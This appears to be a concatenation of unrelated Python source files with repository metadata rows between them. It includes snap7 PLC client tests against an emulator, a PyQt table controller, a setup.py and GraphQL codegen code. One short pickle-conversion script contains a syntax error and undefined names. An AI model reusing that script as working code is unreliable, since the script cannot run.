self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def test_db_read(self):
size = 40
start = 0
db = 1
data = bytearray(40)
self.client.db_write(db_number=db, start=start, data=data)
result = self.client.db_read(db_number=db, start=start, size=size)
self.assertEqual(data, result)
def test_db_write(self):
size = 40
data = bytearray(size)
self.client.db_write(db_number=1, start=0, data=data)
def test_db_get(self):
self.client.db_get(db_number=db_number)
def test_read_multi_vars(self):
db = 1
# build and write test values
test_value_1 = 129.5
test_bytes_1 = bytearray(struct.pack('>f', test_value_1))
self.client.db_write(db, 0, test_bytes_1)
test_value_2 = -129.5
test_bytes_2 = bytearray(struct.pack('>f', test_value_2))
self.client.db_write(db, 4, test_bytes_2)
test_value_3 = 123
test_bytes_3 = bytearray([0, 0])
util.set_int(test_bytes_3, 0, test_value_3)
self.client.db_write(db, 8, test_bytes_3)
test_values = [test_value_1, test_value_2, test_value_3]
# build up our requests
data_items = (S7DataItem * 3)()
data_items[0].Area = ctypes.c_int32(S7AreaDB)
data_items[0].WordLen = ctypes.c_int32(S7WLByte)
data_items[0].Result = ctypes.c_int32(0)
data_items[0].DBNumber = ctypes.c_int32(db)
data_items[0].Start = ctypes.c_int32(0)
data_items[0].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[1].Area = ctypes.c_int32(S7AreaDB)
data_items[1].WordLen = ctypes.c_int32(S7WLByte)
data_items[1].Result = ctypes.c_int32(0)
data_items[1].DBNumber = ctypes.c_int32(db)
data_items[1].Start = ctypes.c_int32(4)
data_items[1].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[2].Area = ctypes.c_int32(S7AreaDB)
data_items[2].WordLen = ctypes.c_int32(S7WLByte)
data_items[2].Result = ctypes.c_int32(0)
data_items[2].DBNumber = ctypes.c_int32(db)
data_items[2].Start = ctypes.c_int32(8)
data_items[2].Amount = ctypes.c_int32(2) # reading an INT, 2 bytes
# create buffers to receive the data
# use the Amount attribute on each item to size the buffer
for di in data_items:
# create the buffer
dataBuffer = ctypes.create_string_buffer(di.Amount)
# get a pointer to the buffer
pBuffer = ctypes.cast(ctypes.pointer(dataBuffer),
ctypes.POINTER(ctypes.c_uint8))
di.pData = pBuffer
result, data_items = self.client.read_multi_vars(data_items)
result_values = []
# function to cast bytes to match data_types[] above
byte_to_value = [util.get_real, util.get_real, util.get_int]
# unpack and test the result of each read
for i in range(0, len(data_items)):
btv = byte_to_value[i]
di = data_items[i]
value = btv(di.pData, 0)
result_values.append(value)
self.assertEqual(result_values[0], test_values[0])
self.assertEqual(result_values[1], test_values[1])
self.assertEqual(result_values[2], test_values[2])
def test_upload(self):
"""
this raises an exception due to missing authorization? maybe not
implemented in server emulator
"""
self.assertRaises(Snap7Exception, self.client.upload, db_number)
@unittest.skip("TODO: invalid block size")
def test_download(self):
data = bytearray(1024)
self.client.download(block_num=db_number, data=data)
def test_read_area(self):
area = snap7.snap7types.areas.DB
dbnumber = 1
amount = 1
start = 1
self.client.read_area(area, dbnumber, start, amount)
def test_write_area(self):
area = snap7.snap7types.areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(size)
self.client.write_area(area, dbnumber, start, data)
def test_list_blocks(self):
blockList = self.client.list_blocks()
def test_list_blocks_of_type(self):
self.client.list_blocks_of_type('DB', 10)
self.assertRaises(Exception, self.client.list_blocks_of_type,
'NOblocktype', 10)
def test_get_block_info(self):
"""test Cli_GetAgBlockInfo"""
self.client.get_block_info('DB', 1)
self.assertRaises(Exception, self.client.get_block_info,
'NOblocktype', 10)
self.assertRaises(Exception, self.client.get_block_info, 'DB', 10)
def test_get_cpu_state(self):
"""this tests the get_cpu_state function"""
self.client.get_cpu_state()
def test_set_session_password(self):
password = 'abcdefgh'
self.client.set_session_password(password)
def test_clear_session_password(self):
self.client.clear_session_password()
def test_set_connection_params(self):
self.client.set_connection_params("10.0.0.2", 10, 10)
def test_set_connection_type(self):
self.client.set_connection_type(1)
self.client.set_connection_type(2)
self.client.set_connection_type(3)
self.client.set_connection_type(20)
def test_get_connected(self):
self.client.get_connected()
def test_ab_read(self):
start = 1
size = 1
data = bytearray(size)
self.client.ab_write(start=start, data=data)
self.client.ab_read(start=start, size=size)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_ab_write(self):
start = 1
size = 10
data = bytearray(size)
self.client.ab_write(start=start, data=data)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_as_ab_read(self):
start = 1
size = 1
self.client.as_ab_read(start=start, size=size)
@unittest.skip("TODO: not yet fully implemented")
def test_as_ab_write(self):
start = 1
size = 10
data = bytearray(size)
self.client.as_ab_write(start=start, data=data)
def test_compress(self):
time = 1000
self.client.compress(time)
def test_as_compress(self):
time = 1000
self.client.as_compress(time)
def test_set_param(self):
values = (
(snap7.snap7types.PingTimeout, 800),
(snap7.snap7types.SendTimeout, 15),
(snap7.snap7types.RecvTimeout, 3500),
(snap7.snap7types.SrcRef, 128),
(snap7.snap7types.DstRef, 128),
(snap7.snap7types.SrcTSap, 128),
(snap7.snap7types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
self.assertRaises(Exception, self.client.set_param,
snap7.snap7types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.snap7types.RemotePort, tcpport),
(snap7.snap7types.PingTimeout, 750),
(snap7.snap7types.SendTimeout, 10),
(snap7.snap7types.RecvTimeout, 3000),
(snap7.snap7types.SrcRef, 256),
(snap7.snap7types.DstRef, 0),
(snap7.snap7types.SrcTSap, 256),
(snap7.snap7types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = snap7.snap7types.LocalPort, snap7.snap7types.WorkInterval,\
snap7.snap7types.MaxClients, snap7.snap7types.BSendTimeout,\
snap7.snap7types.BRecvTimeout, snap7.snap7types.RecoveryTime,\
snap7.snap7types.KeepAliveTime
# invalid param for client
for param in non_client:
self.assertRaises(Exception, self.client.get_param, non_client)
@unittest.skip("TODO: not yet fully implemented")
def test_as_copy_ram_to_rom(self):
self.client.copy_ram_to_rom()
@unittest.skip("TODO: not yet fully implemented")
def test_as_ct_read(self):
self.client.as_ct_read()
@unittest.skip("TODO: not yet fully implemented")
def test_as_ct_write(self):
self.client.as_ct_write()
@unittest.skip("TODO: not yet fully implemented")
def test_as_db_fill(self):
self.client.as_db_fill()
def test_as_db_get(self):
self.client.db_get(db_number=db_number)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_as_db_read(self):
size = 40
start = 0
db = 1
data = bytearray(40)
self.client.db_write(db_number=db, start=start, data=data)
result = self.client.as_db_read(db_number=db, start=start, size=size)
self.assertEqual(data, result)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_as_db_write(self):
size = 40
data = bytearray(size)
self.client.as_db_write(db_number=1, start=0, data=data)
def test_as_download(self):
data = bytearray(128)
self.client.as_download(block_num=-1, data=data)
def test_plc_stop(self):
self.client.plc_stop()
def test_plc_hot_start(self):
self.client.plc_hot_start()
def test_plc_cold_start(self):
self.client.plc_cold_start()
def test_get_pdu_length(self):
pduRequested = self.client.get_param(10)
pduSize = self.client.get_pdu_length()
self.assertEqual(pduSize, pduRequested)
def test_get_cpu_info(self):
expected = (
('ModuleTypeName', 'CPU 315-2 PN/DP'),
('SerialNumber', 'S C-C2UR28922012'),
('ASName', 'SNAP7-SERVER'),
('Copyright', 'Original Siemens Equipment'),
('ModuleName', 'CPU 315-2 PN/DP')
)
cpuInfo = self.client.get_cpu_info()
for param, value in expected:
self.assertEqual(getattr(cpuInfo, param).decode('utf-8'), value)
def test_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_DBWrite
self.client.library.Cli_DBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_DBWrite = original
def test_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client.library.Cli_Download
self.client.library.Cli_Download = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.download(block_num=db_number, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_Download = original
def test_write_area_with_byte_literal_does_not_throw(self):
mock_writearea = mock.MagicMock()
mock_writearea.return_value = None
original = self.client.library.Cli_WriteArea
self.client.library.Cli_WriteArea = mock_writearea
area = snap7.snap7types.areas.DB
dbnumber = 1
size = 4
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.write_area(area, dbnumber, start, data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_WriteArea = original
def test_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_ABWrite
self.client.library.Cli_ABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.ab_write(start=start, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_ABWrite = original
def test_as_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_AsABWrite
self.client.library.Cli_AsABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_ab_write(start=start, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_AsABWrite = original
def test_as_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_AsDBWrite
self.client.library.Cli_AsDBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_AsDBWrite = original
def test_as_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client.library.Cli_AsDownload
self.client.library.Cli_AsDownload = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_download(block_num=db_number, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_AsDownload = original
def test_get_plc_time(self):
self.assertEqual(datetime.now().replace(microsecond=0), self.client.get_plc_datetime())
def test_set_plc_datetime(self):
new_dt = datetime(2011,1,1,1,1,1,0)
self.client.set_plc_datetime(new_dt)
# Can't actual set datetime in emulated PLC, get_plc_datetime always returns system time.
#self.assertEqual(new_dt, self.client.get_plc_datetime())
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.snap7types.RemotePort, 1102),
(snap7.snap7types.PingTimeout, 800),
(snap7.snap7types.SendTimeout, 15),
(snap7.snap7types.RecvTimeout, 3500),
(snap7.snap7types.SrcRef, 128),
(snap7.snap7types.DstRef, 128),
(snap7.snap7types.SrcTSap, 128),
(snap7.snap7types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
class TestLibraryIntegration(unittest.TestCase):
def setUp(self):
# replace the function load_library with a mock
self.loadlib_patch = mock.patch('snap7.client.load_library')
self.loadlib_func = self.loadlib_patch.start()
# have load_library return another mock
self.mocklib = mock.MagicMock()
self.loadlib_func.return_value = self.mocklib
# have the Cli_Create of the mock return None
self.mocklib.Cli_Create.return_value = None
def tearDown(self):
# restore load_library
self.loadlib_patch.stop()
def test_create(self):
client = snap7.client.Client()
self.mocklib.Cli_Create.assert_called_once()
def test_gc(self):
client = snap7.client.Client()
del client
self.mocklib.Cli_Destroy.assert_called_once()
if __name__ == '__main__':
unittest.main()
# TODO: implement
"""
Cli_AsEBRead
Cli_AsEBWrite
Cli_AsFullUpload
Cli_AsListBlocksOfType
Cli_AsMBRead
Cli_AsMBWrite
Cli_AsReadArea
Cli_AsReadSZL
Cli_AsReadSZLList
Cli_AsTMRead
Cli_AsTMWrite
Cli_AsUpload
Cli_AsWriteArea
Cli_CheckAsCompletion
Cli_Connect
Cli_CopyRamToRom
Cli_CTRead
Cli_CTWrite
Cli_DBFill
Cli_Delete
Cli_EBRead
Cli_EBWrite
Cli_ErrorText
Cli_FullUpload
Cli_GetAgBlockInfo
Cli_GetCpInfo
Cli_GetExecTime
Cli_GetLastError
Cli_GetOrderCode
Cli_GetParam
Cli_GetPduLength
Cli_GetPgBlockInfo
Cli_GetPlcStatus
Cli_GetProtection
Cli_IsoExchangeBuffer
Cli_MBRead
Cli_MBWrite
Cli_ReadArea
Cli_ReadMultiVars
Cli_ReadSZL
Cli_ReadSZLList
Cli_SetAsCallback
Cli_SetParam
Cli_SetPlcSystemDateTime
Cli_SetSessionPassword
Cli_TMRead
Cli_TMWrite
Cli_WaitAsCompletion
Cli_WriteMultiVars
"""
| 31.367201 | 97 | 0.648349 |
4a20eec5bd6d38dec21fa91ff287b28a5ba0da7a | 480 | py | Python | projectAI/generateOpenAPI/sample_function_gen.py | cybertraining-dsc/sp20-516-237 | 267f5188dbf3ba55c3753829bab33ff4095eaf49 | [
"Apache-2.0"
] | null | null | null | projectAI/generateOpenAPI/sample_function_gen.py | cybertraining-dsc/sp20-516-237 | 267f5188dbf3ba55c3753829bab33ff4095eaf49 | [
"Apache-2.0"
] | 2 | 2020-01-22T11:46:53.000Z | 2020-02-05T20:15:00.000Z | projectAI/generateOpenAPI/sample_function_gen.py | cybertraining-dsc/sp20-516-237 | 267f5188dbf3ba55c3753829bab33ff4095eaf49 | [
"Apache-2.0"
] | 4 | 2020-01-20T23:59:02.000Z | 2020-03-01T11:44:13.000Z | import sys
sys.path.append('/Users/Jonathan/cm/sp20-516-237/projectAI/generateOpenAPI/')
import generateOpenAPI as gen
def sampleFunction(x: int, y: float) -> float:
"""
Multiply int and float sample.
:param x: x value
:type x: int
:param y: y value
:type y: float
:return: result
:return type: float
"""
return x * y
f = sampleFunction
openAPI = gen.GenerateOpenAPI()
spec = gen.GenerateOpenAPI.generate_openapi(openAPI, f)
print(spec)
| 21.818182 | 77 | 0.679167 |
4a20eed33115e5cfd18ad5f4d80b913bd08607a8 | 483 | py | Python | Videos/Skeleton-Training/pickle-pickle-translation.py | 93TEI/3D_Action_Recognition | b648f4cd8e479872c0cd9488120ada18bc64e5ad | [
"MIT"
] | 33 | 2018-05-22T08:35:59.000Z | 2021-10-06T09:56:07.000Z | Videos/Skeleton-Training/pickle-pickle-translation.py | 93TEI/3D_Action_Recognition | b648f4cd8e479872c0cd9488120ada18bc64e5ad | [
"MIT"
] | 2 | 2018-09-19T19:32:19.000Z | 2019-05-09T02:27:06.000Z | Videos/Skeleton-Training/pickle-pickle-translation.py | Naman-ntc/Action-Recognition | b648f4cd8e479872c0cd9488120ada18bc64e5ad | [
"MIT"
] | 5 | 2018-05-06T20:48:38.000Z | 2019-09-01T07:55:09.000Z | import numpy
import pickle
import torch
labelDict = pickle.load(open('labelDict.pkl','rb'))
trainDict = pickle.load(open('train_data.pkl'.'rb'))
total_samples = len(trainDict)
data = [None]*total_samples
labels = np.zeros(total_samples)
counter = 0
for k,v in trainDict:
myk = int(k[5:])
mylab = labelDict[myk]
data[counter] = torch.from_numpy(v.reshape(-1))
labels = labelDict[myk]
counter += 1
pickle.dump(data,open('trainData.npy'))
np.save('trainLabels.npy', labels) | 19.32 | 52 | 0.718427 |
4a20eedc98782b11702f26b0ea554da846dd9676 | 1,029 | py | Python | setup.py | Jingren-hou/NeuralCDE | 7e529f58441d719d2ce85f56bdee3208a90d5132 | [
"Apache-2.0"
] | 438 | 2020-05-19T11:47:50.000Z | 2022-03-23T05:40:32.000Z | setup.py | Anewnoob/NeuralCDE | 3c6871c0591d82a61654c6d21d360f528465f9d2 | [
"Apache-2.0"
] | 8 | 2020-05-27T03:37:05.000Z | 2022-03-09T05:48:27.000Z | setup.py | Anewnoob/NeuralCDE | 3c6871c0591d82a61654c6d21d360f528465f9d2 | [
"Apache-2.0"
] | 62 | 2020-05-19T13:55:45.000Z | 2022-03-19T17:36:36.000Z | import pathlib
import setuptools
here = pathlib.Path(__file__).resolve().parent
with open(here / 'controldiffeq/README.md', 'r') as f:
readme = f.read()
setuptools.setup(name='controldiffeq',
version='0.0.1',
author='Patrick Kidger',
author_email='[email protected]',
maintainer='Patrick Kidger',
maintainer_email='[email protected]',
description='PyTorch functions for solving CDEs.',
long_description=readme,
url='https://github.com/patrick-kidger/NeuralCDE/tree/master/controldiffeq',
license='Apache-2.0',
zip_safe=False,
python_requires='>=3.5, <4',
install_requires=['torch>=1.0.0', 'torchdiffeq>=0.0.1'],
packages=['controldiffeq'],
classifiers=["Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License"])
| 36.75 | 93 | 0.549077 |
4a20eeeb7f03847cc6d55cac7a4dc127ed213cd2 | 5,979 | py | Python | peakpo/control/waterfalltablecontroller.py | SHDShim/PeakPo | 75bdc12da18d70a946a24dde9b12c859150ca0b6 | [
"Apache-2.0"
] | 15 | 2017-09-02T13:55:35.000Z | 2022-03-26T08:20:16.000Z | peakpo/control/waterfalltablecontroller.py | SHDShim/peakpo-v7 | 7a929f735621dfa05bd40e7d64208757161fa43e | [
"Apache-2.0"
] | null | null | null | peakpo/control/waterfalltablecontroller.py | SHDShim/peakpo-v7 | 7a929f735621dfa05bd40e7d64208757161fa43e | [
"Apache-2.0"
] | 2 | 2018-05-16T13:32:08.000Z | 2019-06-16T08:09:38.000Z | import os
from PyQt5 import QtWidgets
from PyQt5 import QtCore
from PyQt5 import QtGui
from utils import SpinBoxFixStyle, extract_filename
from .mplcontroller import MplController
class WaterfallTableController(object):
def __init__(self, model, widget):
self.model = model
self.widget = widget
self.plot_ctrl = MplController(self.model, self.widget)
def _apply_changes_to_graph(self, reinforced=False):
"""
this does not do actual nomalization but the processing.
actual normalization takes place in plotting.
"""
if reinforced:
pass
else:
if not self.model.waterfall_exist():
return
count = 0
for ptn in self.model.waterfall_ptn:
if ptn.display:
count += 1
if count == 0:
return
self.plot_ctrl.update()
def update(self):
"""
show a list of jcpds in the list window of tab 3
called from maincontroller
"""
n_columns = 4
n_rows = self.model.waterfall_ptn.__len__() # count for number of jcpds
self.widget.tableWidget_wfPatterns.setColumnCount(n_columns)
self.widget.tableWidget_wfPatterns.setRowCount(n_rows)
self.widget.tableWidget_wfPatterns.horizontalHeader().setVisible(True)
self.widget.tableWidget_wfPatterns.setHorizontalHeaderLabels(
['', '', '', 'Wavelength'])
self.widget.tableWidget_wfPatterns.setVerticalHeaderLabels(
[extract_filename(wfp.fname) for wfp in self.model.waterfall_ptn])
for row in range(n_rows):
# column 0 - checkbox
item0 = QtWidgets.QTableWidgetItem()
item0.setFlags(QtCore.Qt.ItemIsUserCheckable |
QtCore.Qt.ItemIsEnabled)
if self.model.waterfall_ptn[row].display:
item0.setCheckState(QtCore.Qt.Checked)
else:
item0.setCheckState(QtCore.Qt.Unchecked)
self.widget.tableWidget_wfPatterns.setItem(row, 0, item0)
# column 1 - color
item2 = QtWidgets.QTableWidgetItem('')
self.widget.tableWidget_wfPatterns.setItem(row, 1, item2)
# column 3 - color setup
self.widget.tableWidget_wfPatterns_pushButton_color = \
QtWidgets.QPushButton('.')
self.widget.tableWidget_wfPatterns.item(row, 1).setBackground(
QtGui.QColor(self.model.waterfall_ptn[row].color))
self.widget.tableWidget_wfPatterns_pushButton_color.clicked.\
connect(self._handle_ColorButtonClicked)
self.widget.tableWidget_wfPatterns.setCellWidget(
row, 2,
self.widget.tableWidget_wfPatterns_pushButton_color)
# column 3 - wavelength
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength = \
QtWidgets.QDoubleSpinBox()
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing |
QtCore.Qt.AlignVCenter)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setMaximum(2.0)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setSingleStep(0.0001)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setDecimals(4)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setProperty("value", self.model.waterfall_ptn[row].wavelength)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
valueChanged.connect(
self._handle_doubleSpinBoxChanged)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setStyle(SpinBoxFixStyle())
self.widget.tableWidget_wfPatterns.setCellWidget(
row, 3,
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setKeyboardTracking(False)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setFocusPolicy(QtCore.Qt.StrongFocus)
self.widget.tableWidget_wfPatterns.resizeColumnsToContents()
# self.widget.tableWidget_wfPatterns.resizeRowsToContents()
self.widget.tableWidget_wfPatterns.itemClicked.connect(
self._handle_ItemClicked)
# self._apply_changes_to_graph(reinforced=True)
def _handle_doubleSpinBoxChanged(self, value):
box = self.widget.sender()
index = self.widget.tableWidget_wfPatterns.indexAt(box.pos())
if index.isValid():
idx = index.row()
self.model.waterfall_ptn[idx].wavelength = value
self._apply_changes_to_graph()
def _handle_ColorButtonClicked(self):
button = self.widget.sender()
index = self.widget.tableWidget_wfPatterns.indexAt(button.pos())
if index.isValid():
idx = index.row()
if index.column() == 2:
color = QtWidgets.QColorDialog.getColor()
if color.isValid():
self.widget.tableWidget_wfPatterns.item(idx, 1).\
setBackground(color)
self.model.waterfall_ptn[idx].color = str(color.name())
self._apply_changes_to_graph()
def _handle_ItemClicked(self, item):
if item.column() != 0:
return
idx = item.row()
box_checked = (item.checkState() == QtCore.Qt.Checked)
if box_checked == self.model.waterfall_ptn[idx].display:
return
else:
self.model.waterfall_ptn[idx].display = box_checked
self._apply_changes_to_graph(reinforced=True)
| 44.288889 | 80 | 0.632045 |
4a20ef0d2e874af88849364dc92a658ef0d1437c | 31,065 | py | Python | sgqlc/codegen/operation.py | wolfgangpfnuer/sgqlc | ca48f1318c48f959843a641fa3fa6f66a3857ebc | [
"0BSD"
] | 429 | 2018-01-18T00:26:23.000Z | 2022-03-30T07:10:04.000Z | sgqlc/codegen/operation.py | wolfgangpfnuer/sgqlc | ca48f1318c48f959843a641fa3fa6f66a3857ebc | [
"0BSD"
] | 177 | 2018-01-17T17:51:48.000Z | 2022-03-31T05:19:46.000Z | sgqlc/codegen/operation.py | wolfgangpfnuer/sgqlc | ca48f1318c48f959843a641fa3fa6f66a3857ebc | [
"0BSD"
] | 74 | 2018-01-17T23:48:28.000Z | 2022-02-17T13:58:58.000Z | import argparse
import json
import re
import sys
from collections import OrderedDict
from typing import List, NamedTuple, Union
from sgqlc.types import BaseItem
from graphql.language.source import Source
from graphql.language.parser import parse as parse_graphql
from graphql.language.visitor import Visitor, visit
__docformat__ = 'reStructuredText en'
to_python_name = BaseItem._to_python_name
def format_graphql_type(typ):
kind = typ['kind']
if kind == 'NON_NULL':
of_type = typ['ofType']
return '%s!' % (format_graphql_type(of_type),)
elif kind == 'LIST':
of_type = typ['ofType']
return '[%s]' % (format_graphql_type(of_type),)
else:
return typ['name']
def is_value_required(field):
return field['type']['kind'] == 'NON_NULL' \
and field.get('defaultValue')
class Variable:
def __init__(self, name):
self.name = name
self.type = None
self.default_value = None
self.node = None
self.usage = 0
def __repr__(self):
return 'sgqlc.types.Variable(%r)' % (self.name,)
# Use Null instead of None as Visitor.leave_* understands None as IDLE,
# which keeps the original node.
class Null:
def __repr__(self):
return 'None'
class NoValidation:
def get_operation_type(self, operation_name):
return None
def get_type(self, type_name):
return None
def get_type_field(self, typ, field_name):
return None
def get_field_argument(self, field, argument_name):
return None
def unwrap_type(self, typ):
return None
def validate_type(self, typ, candidate, value):
return None
def validate_object(typ, candidate_name):
return None
def validate_input_object_fields(self, typ, obj):
return None
def validate_type_matches(self, typ, candidate):
return None
def validate_variable_definition(self, definition):
return None
class SchemaValidation(NoValidation):
def __init__(self, schema):
self.schema = schema
self.types = sorted(schema['types'], key=lambda x: x['name'])
self.type_by_name = {
t['name']: self._create_type(t) for t in self.types
}
self.operations = {
'query': self._get_path('queryType', 'name'),
'mutation': self._get_path('mutationType', 'name'),
'subscription': self._get_path('subscriptionType', 'name'),
}
def _get_path(self, *path, fallback=None):
d = self.schema
path = list(path)
while d and path:
d = d.get(path.pop(0))
if d is None:
return fallback
return d
def _create_type(self, typ):
fields = typ.get('fields') or typ.get('inputFields') or []
typ['fields'] = {
f['name']: self._create_field(f) for f in fields
}
if 'inputFields' in typ:
del typ['inputFields']
enum_values = typ['enumValues'] or []
typ['enumValues'] = {e['name'] for e in enum_values}
possible_types = typ['possibleTypes'] or typ['interfaces'] or []
typ['possibleTypes'] = {t['name'] for t in possible_types}
return typ
def _create_field(self, field):
args = field.get('args') or []
field['args'] = {
a['name']: a for a in args
}
return field
def get_operation_type(self, operation_name):
type_name = self.operations[operation_name]
return self.type_by_name[type_name]
def get_type(self, type_name):
return self.type_by_name[type_name]
@staticmethod
def get_type_field(typ, field_name):
return typ['fields'][field_name]
@staticmethod
def get_field_argument(field, argument_name):
return field['args'][argument_name]
@staticmethod
def unwrap_type(typ):
while typ.get('ofType'):
typ = typ['ofType']
return typ
@staticmethod
def validate_non_null(candidate_name):
if candidate_name == 'Null':
raise ValueError('got null where non-null is required')
type_alternatives = {
'ID': ('Int', 'String'),
'Float': ('Int',),
}
builtin_types = ('Int', 'Float', 'String', 'Boolean', 'ID')
accepted_user_scalars = ('String',)
@classmethod
def validate_scalar(cls, name, candidate_name):
if name == candidate_name:
return
alternatives = cls.type_alternatives.get(name, ())
if candidate_name in alternatives:
return
# user-defined scalars are usually defined as strings
if name not in cls.builtin_types and \
candidate_name in cls.accepted_user_scalars:
return
raise ValueError('got %s where %s is required' %
(candidate_name, name))
def validate_enum(self, name, candidate_name, value):
if candidate_name != 'Enum':
raise ValueError('got %s where %s is required' %
(candidate_name, name))
enum = self.get_type(name)
if value not in enum['enumValues']:
raise ValueError('enum %s has no value %s' % (name, value))
def validate_type(self, typ, candidate_name, value):
while typ:
kind = typ['kind']
name = typ.get('name')
if kind == 'NON_NULL':
self.validate_non_null(candidate_name)
elif value is None or isinstance(value, Null):
return
elif kind == 'LIST':
pass
elif kind == 'SCALAR':
self.validate_scalar(name, candidate_name)
return
elif kind == 'ENUM':
self.validate_enum(name, candidate_name, value)
return
elif kind == 'OBJECT' or kind == 'INPUT_OBJECT':
self.validate_object(typ, candidate_name)
return
else:
raise ValueError('cannot validate kind=%s' % (kind,))
typ = typ.get('ofType')
@staticmethod
def validate_object(typ, candidate_name):
name = typ['name']
if candidate_name != name:
raise ValueError('got %s where %s is required' %
(candidate_name, name))
def validate_input_object_fields(self, typ, obj):
required = set()
name = self.unwrap_type(typ)['name']
fields = self.get_type(name)['fields']
for f in fields.values():
if is_value_required(f):
required.add(f['name'])
for name in obj.keys():
if name in required:
required.remove(name)
if required:
raise ValueError('missing required fields of type %s: %s' %
(typ['name'], ', '.join(required)))
@staticmethod
def validate_type_matches(typ, candidate):
used = format_graphql_type(candidate)
required = format_graphql_type(typ)
if not required.endswith('!'):
used = used.rstrip('!') # relax candidate type
if required != used:
msg = 'got %s where %s is required' % (
format_graphql_type(candidate),
required,
)
raise ValueError(msg)
def validate_variable_definition(self, definition):
if definition.type['kind'] == 'NON_NULL' and definition.default_value:
raise ValueError('non-null variables can\'t have default value')
class SelectionFormatResult(NamedTuple):
lines: List[str]
idx: int
class ParsedSchemaName(NamedTuple):
path: Union[str, None]
modname: str
sym: str
def __str__(self):
return '%s.%s' % (self.modname, self.sym)
_parse_regex = re.compile(
'^(?P<path>[.]*)(?P<modname>[^:]+)(?:|(:(?P<sym>[a-zA-Z0-9_]+)))$'
)
@classmethod
def parse_schema_name(cls, schema_name):
'''
>>> ParsedSchemaName.parse_schema_name('schema')
ParsedSchemaName(path=None, modname='schema', sym='schema')
>>> ParsedSchemaName.parse_schema_name('schema:sym')
ParsedSchemaName(path=None, modname='schema', sym='sym')
>>> ParsedSchemaName.parse_schema_name('..schema:sym')
ParsedSchemaName(path='..', modname='schema', sym='sym')
>>> ParsedSchemaName.parse_schema_name('..schema')
ParsedSchemaName(path='..', modname='schema', sym='schema')
'''
m = cls._parse_regex.match(schema_name)
if not m:
raise ValueError('invalid schema_name format')
path = m.group('path') or None
modname = m.group('modname')
sym = m.group('sym') or modname
return cls(path, modname, sym)
class GraphQLToPython(Visitor):
def __init__(self, validation, schema_name, short_names):
self.validation = validation
self.schema_name = schema_name
self.short_names = short_names
self.type_stack = []
self.field_stack = []
self.variables = {}
self.current_variable_definition = None
@staticmethod
def leave_name(node, *_args):
return node.value
def leave_variable(self, node, *_args):
name = node.name
if not self.current_variable_definition:
try:
v = self.variables[name]
except KeyError as ex:
self.report_unknown_variable(node, ex)
self.validation.validate_type_matches(self.type_stack[-1], v.type)
v.usage += 1
return v
v = self.current_variable_definition
v.name = name
self.variables[name] = v
return v
def leave_document(self, node, *_args):
unused = []
for v in self.variables.values():
if v.usage == 0:
unused.append(v)
if unused:
self.report_unused_variables(unused)
return node.definitions
def selection_name(self, parent, name, idx):
if self.short_names:
return '_sel%d' % (idx,)
else:
return '%s_%s' % (parent, name)
def format_selection_set_field(self, parent, name, selection,
children, lines, idx):
field_selection = '%s.%s' % (parent, selection)
if not children:
lines.append(field_selection)
return SelectionFormatResult(lines, idx)
sel = self.selection_name(parent, name, idx)
idx += 1
lines.append('%s = %s' % (sel, field_selection))
return self.format_selection_set(sel, children, lines, idx)
def format_selection_set_inline_fragment(self, parent, type_condition,
children, lines, idx):
